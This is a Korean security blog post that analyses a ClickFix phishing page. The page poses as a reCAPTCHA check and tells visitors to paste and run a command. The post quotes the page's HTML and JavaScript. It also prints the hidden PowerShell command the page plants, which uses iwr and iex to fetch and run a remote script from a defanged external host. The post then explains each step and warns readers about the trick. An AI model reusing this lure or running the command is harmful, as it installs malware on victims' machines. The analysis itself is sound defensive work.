오늘은 캡차 복사 붙여넣기 기법 을 악용을 하는 클릭픽스(ClickFix)인 blessdayservices(.)org/up(2025.3.24)에 대해 알아보겠습니다.해당 클릭픽스(ClickFix) 수법은 간단합니다.사람이 아닌 컴퓨터 인지 확인을 위해서 필요한 캡챠 기능을 악용을 합니다.정상적인 캡챠 인 경우 횡단보도,자동차,소화전,버스 같은것을 클릭을 하게 해서 맞으면 통과 시키거나 아니면 그림 하나 보여 주고 이것 하고 비슷한 동물,물체 고르게 하는 방법입니다.
여기까지는 정상이지만 클릭픽스(ClickFix)은 나는 로봇이 아니에요.라고 하면 cmd를 실행을 해서 복사 붙여넣기를 하게 만드는것이 특징 이며 이렇게 되면 악의적으로 조작된 파워셀등을 통해서 사용자 컴퓨터는 악성코드가 실행이 되어서 개인정보 같은것이 털리게 되어져 있습니다.
보면 화면에 보면 인증 하라고 하는데 어썰프게 생긴것을 확인을 할수가 있습니다.
해당 웹사이트를 웹소스를 보며 다음과 같습니다.
<div id="verify-window" class="verify-window">
<div class="verify-container">
<header class="verify-header">
<span class="verify-header-text-medium m-p block">Complete these</span>
<span class="verify-header-text-big m-p block">Verification Steps</span>
<span class="verify-header-text-medium m-p block"></span>
</header>
<main class="veri(f)y-main">
<p>
To better pr(o)ve you are not a robot, please:
</p>
<ol>
<li>
Press & hol(d) the Windows Key <i class=(")fab fa-windows"></i> + <b>R</b>.
</li>
<li>
In the verificat(i)on window, press <b>Ctrl</b> + <b>V</b>.
</li>
<li>
Press <b>E(n)ter</b> on your keyboard to finish.
</li>
</ol>
<p>
You will observe and agree:
<br>
<code>
✅ "I am not (a) robot - reCAPTCHA Verification Hash: <span id="verification-id">1110</span>"
</code>
</p>
</main>
</div>
<footer class="verify-container verify-footer">
<div class="verify-footer-left">
Perform the steps above to finish verification.
</div>
<button type="button" class="verify-ver(i)fy-button block" id="verify-verify-button" disabled="true">Verify</button>
</footer>
</div>
</div>
<script>
document(.)addEventListener("DOMCo(n)tentLoaded", function () {
if (/Mobi|Android|iPhone|iPad|iPod/i(.)test(navigator.userAgent)) {
document.getElementById("mobileWarn(i)ngModal").style.display = "block";
document.body.style.overflow = "hidd(e)n"; // Prevent scrolling
}
});코드 분석
1.전체 동작
해당 코드의 구조는 마치 사용자가 로봇이 아님 을 확인하기 위한 일종의 사용자 인증(Verification) 과정을 요구하게 해서 해당 부분에 있는 지시를 따르게 합니다.
2.수상한 사용자 지침 분석
HTML에 표시되는 사용자의 행동 유도 절차는 다음과 같습니다:
사용자에게 요구하는 단계:
1.Windows + R 키 입력
2.실행창에 Ctrl + V (즉 복사,붙여넣기)
3.Enter 키 입력
3. HTML 구조 분석
문제점:
reCAPTCHA Verification Hash라는 문자열은 실제 reCAPTCHA와는 아무 관련이 없으면 Google reCAPTCHA는 이런 형태로 사용자 인증을 하지 않습니다.
disabled="true"인 버튼은 심리적으로 사용자가 직접적인 클릭 대신 지시를 따르게 만드는 방식
4.JavaScript 분석
해당 JS는 모바일 환경에서 접속 시 mobileWarningModal이라는 모달을 띄워 모바일 사용자에겐 특정 메시지를 표시하거나 차단하려는 용도
PC 사용자에게만 악성 명령을 실행시키기 위한 필터링
클릭시 생성 되는 powershell 코드
powershell -w hidden -c "Start-Process powershell -ArgumentList '-w hidden -c iwr hxxps://irp(.)cdn-website(.)com/45d8c6e0/files/uploaded/32(.)ps1 | iex' -WindowStyle Hidden" # ✅ ''I am not a robot - reCAPTCHA Verification Hash: 5026''분석
해당 PowerShell 명령어는 2단계 PowerShell 호출 체계 를 사용해 외부의 스크립트를 다운로드하고 실행 하는 방법 사용
1.명령 전체 구조
powershell -w hidden -c:첫 번째 PowerShell 호출, 콘솔 창 숨김, 명령 실행 (-Command)
Start-Process powershell:두 번째 PowerShell 프로세스 생성
-ArgumentList '...':두 번째 PowerShell에 인자로 명령어 전달
iwr ...: iex 다운로드 (Invoke-WebRequest) + 실행 (Invoke-Expression)
-WindowStyle Hidden:새 PowerShell 창도 사용자 몰래 실행
외부에서 PowerShell 스크립트(32.ps1)를 다운로드하고 아무 표시 없이 실행하는데 지금은 403 이라서 해당 샘플은 미 확보
실제 동작 흐름
1.사용자가 Ctrl + V + Enter로 위 명령을 실행
2.PowerShell이 숨겨진 모드로 실행되며 또 다른 PowerShell을 생성함
3.두 번째 PowerShell이 32.ps1 파일을 다운로드 (iwr)->파일 즉시 실행 (iex)
4.사용자는 인식을 할수가 없으며 악성코드가 시스템에 상주
결론 복사 붙여넣기 하라고 하면 의심 해야 되는것이 아니고 그냥 내 컴퓨터에 악성코드가 설치 된다.생각 하시면 됩니다.
'소프트웨어 팁 > 보안 및 분석' 카테고리의 다른 글
| 북한 해킹 단체 APT37(Reaper)에서 만든 악성코드-한국군사학논총(2025.3.26) (0) | 2025.03.31 |
|---|---|
| 김수키(Kimsuky)성범죄자의 신상정보공개 양식 으로 위장해서 만든 악성코드-성범죄자 신상정보 고지.pdf.lnk(2025.3.25) (0) | 2025.03.28 |
| 포스코 사칭 피싱 사이트-caller(.)3utilities(.)com(2025.3.24) (0) | 2025.03.27 |
| 북한 해킹 단체 김수키(Kimsuky)에서 만든 저작권 사칭 관련 악성코드-저작권관련내역.url(2025.3.21) (0) | 2025.03.25 |
| 2017년 이후 11개 국가 북한 해킹 그룹등 새로운 Windows 제로데이를 악용 (0) | 2025.03.20 |
| 북한 김수키(Kimsuky)에서 만든 악성 백도어 VBS 스크립트-vbs.html(2025.3.16) (0) | 2025.03.19 |
| 김수키(Kimsuky) 에서 만든 파워셀 악성코드-1.ps1(<-가칭 2025.3.13) (0) | 2025.03.17 |
| 북한 해킹 그룹 Konni(코니)에서 만든 사이버범죄 신고시스템 사칭 악성코드-ECRM.hwp.lnk(2025.3.11) (0) | 2025.03.14 |
